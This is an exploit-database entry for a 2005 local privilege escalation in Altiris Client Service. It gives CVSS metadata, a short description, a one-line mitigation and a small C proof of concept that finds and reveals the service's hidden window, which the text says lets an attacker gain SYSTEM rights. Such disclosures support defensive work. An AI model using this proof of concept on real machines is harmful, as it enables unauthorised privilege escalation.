Altiris Client Service Local Privilege Escalation Vulnerability

vendor:

Client Service

by:

SecurityFocus

7.2

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: Client Service

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2005

Altiris Client Service Local Privilege Escalation Vulnerability

An attacker may leverage this issue to gain SYSTEM level privileges on an affected computer by using a malicious code to find the window of the Altiris Client Service and show it.

Mitigation:

Restrict access to privileged interfaces.

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/13409/info

A local privilege escalation vulnerability affects the Altiris Client Service. This issue is due to a failure of the application to properly secure access to privileged interfaces.

An attacker may leverage this issue to gain SYSTEM level privileges on an affected computer. 

#include <stdio.h>
#include <windows.h>

int main( void )
{
        HWND hWnd;
        char szWindowName[] = "Altiris Client Service";

        printf( "Finding window %s\n", szWindowName );

        hWnd = FindWindow( NULL, szWindowName );

        if ( hWnd == NULL )
        {
                printf( "ERROR! Could not find window %s\n", szWindowName );

                exit( 1 );
        }

        ShowWindow( hWnd, SW_SHOW );

        return 0;
}